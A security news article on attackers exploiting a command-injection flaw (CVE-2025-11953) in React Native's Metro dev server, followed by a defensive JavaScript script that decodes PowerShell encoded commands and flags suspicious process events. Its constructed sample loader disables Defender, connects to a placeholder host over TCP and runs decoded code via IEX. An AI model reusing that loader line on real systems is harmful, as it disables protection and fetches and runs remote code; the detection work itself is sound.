HACKERS abused a critical flaw in the React Native Community CLI's Metro development server, tracked as CVE-2025-11953, to run remote commands and drop Rust malware weeks before the exploitation was publicly reported. The advisory notes that the Metro development server binds to external interfaces by default and exposes an endpoint vulnerable to command injection, so an unauthenticated attacker who can reach the server can execute arbitrary executables with a single POST request and, on Windows hosts, arbitrary shell commands.
VulnCheck observed real-world exploitation of CVE-2025-11953 on 21 December 2025 and again in January 2026, showing that attackers kept using the flaw despite the limited public attention it had received. The exploit chain delivered a multi-stage, base64-encoded PowerShell loader, disabled Microsoft Defender protections, and fetched further payloads over raw TCP, culminating in a UPX-packed Rust payload with basic anti-analysis features.
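For defenders, the chain above reduces to a few telemetry checks. The following is an added example of that triage logic, written here rather than taken from VulnCheck's report: it decodes PowerShell `-EncodedCommand` arguments from process-creation events and flags Defender tampering, raw-socket downloads and nested decoding in the decoded script, with the Node.js dev server as parent process used as a context signal. The event field names, the sample events and the stage-one script are constructed for the example, and the cmdlet and class names matched are generic examples of the described behaviours, not the campaign's exact strings.

```javascript
// Added example, not from VulnCheck's report. Runs offline on constructed events.

// PowerShell -EncodedCommand is base64 over UTF-16LE text, and PowerShell accepts
// abbreviated switch names, so -e, -ec and -enc must all be caught.
function extractEncodedCommand(cmdline) {
  const m = /(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)/i.exec(cmdline);
  return m ? m[1] : null;
}
function decodeEncodedCommand(b64) {
  return Buffer.from(b64, 'base64').toString('utf16le');
}
function encodeForPowerShell(script) {
  return Buffer.from(script, 'utf16le').toString('base64');
}

// Content indicators applied to the decoded script (generic patterns, assumed).
const SCRIPT_INDICATORS = [
  { name: 'defender-tamper', re: /Set-MpPreference\s+-Disable\w+\s+\$?true/i },
  { name: 'raw-tcp-client', re: /System\.Net\.Sockets\.TcpClient/i },
  { name: 'nested-stage', re: /FromBase64String|\bIEX\b|Invoke-Expression/i },
];

function analyseEvent(ev) {
  const indicators = [];
  const encoded = extractEncodedCommand(ev.cmdline);
  let decoded = null;
  if (encoded) {
    decoded = decodeEncodedCommand(encoded);
    indicators.push('encoded-command');
    for (const { name, re } of SCRIPT_INDICATORS) if (re.test(decoded)) indicators.push(name);
  }
  // Context signal: a PowerShell child of node.exe is the shape a command injection
  // through a Node.js dev server would produce (parentImage is an assumed field name).
  if (/powershell\.exe$/i.test(ev.image) && /node\.exe$/i.test(ev.parentImage)) {
    indicators.push('spawned-by-node-dev-server');
  }
  return { pid: ev.pid, decoded, indicators };
}

// Returns only events carrying at least one indicator, most indicators first.
function triage(events) {
  return events.map(analyseEvent)
    .filter((r) => r.indicators.length > 0)
    .sort((a, b) => b.indicators.length - a.indicators.length);
}

// Constructed stage-one script and process-creation events (not captured data).
const STAGE1_SCRIPT =
  'Set-MpPreference -DisableRealtimeMonitoring $true; ' +
  '$c = New-Object System.Net.Sockets.TcpClient("198.51.100.7", 4444); ' +
  'IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($next)))';

const SAMPLE_EVENTS = [
  { pid: 4120, image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Program Files\\nodejs\\node.exe',
    cmdline: `powershell.exe -nop -w hidden -enc ${encodeForPowerShell(STAGE1_SCRIPT)}` },
  { pid: 4121, image: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe',
    parentImage: 'C:\\Windows\\explorer.exe',
    cmdline: 'powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1' },
  { pid: 4122, image: 'C:\\Program Files\\nodejs\\node.exe',
    parentImage: 'C:\\Windows\\System32\\cmd.exe',
    cmdline: 'node.exe ./node_modules/.bin/react-native start' },
];

for (const hit of triage(SAMPLE_EVENTS)) console.log(hit.pid, hit.indicators.join(', '));
```

Decoding the argument rather than matching on the base64 string is what makes the rule durable: re-encoding a loader changes the ciphertext-like blob but not the cmdlets inside it. The parent-process signal on its own will also fire on legitimate npm scripts that call PowerShell on Windows, so weigh it with the content indicators rather than alerting on it alone.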
The report cautions that this was exploitation in the wild rather than researcher testing, underlining the risk that arises when infrastructure such as this development server becomes reachable from the network.